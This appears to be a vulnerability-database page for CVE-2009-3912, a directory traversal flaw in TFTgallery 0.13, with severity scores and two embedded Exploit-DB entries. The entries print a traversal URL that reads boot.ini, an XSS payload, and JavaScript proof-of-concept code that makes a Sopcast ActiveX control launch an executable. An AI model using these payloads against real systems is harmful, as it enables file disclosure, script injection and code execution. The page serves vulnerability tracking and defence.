CVE-2009-3912
published 2009-11-09CVE-2009-3912: Directory traversal vulnerability in index.php in TFTgallery 0.13 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot slash) in the…
PriorityP432medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.74%
84.3th percentile
Directory traversal vulnerability in index.php in TFTgallery 0.13 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot slash) in the album parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tftgallery | tftgallery | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TFTgallery .13 - Directory Traversal
exploitdb·2009-11-02
CVE-2009-3912 TFTgallery .13 - Directory Traversal
TFTgallery .13 - Directory Traversal
---
Released information about the album parameter being vulnerable to XSS
earlier. Seems there are other similar issues:
The album parameter is vulnerable to directory transversal
http://example.com/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1
The sample parameter is vulnerable to XSS
http://example.com/tftgallery/settings.php?sample='>alert('blake
XSS test')&name=cucumber%20cool
Exploit-DB
Sopcast SopCore Control - 'sopocx.ocx' Command Execution
exploitdb·2009-03-03
CVE-2009-0811 Sopcast SopCore Control - 'sopocx.ocx' Command Execution
Sopcast SopCore Control - 'sopocx.ocx' Command Execution
---
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
# milw0rm.com [2009-03-03]
No writeups or analysis indexed.
2009-11-09
Published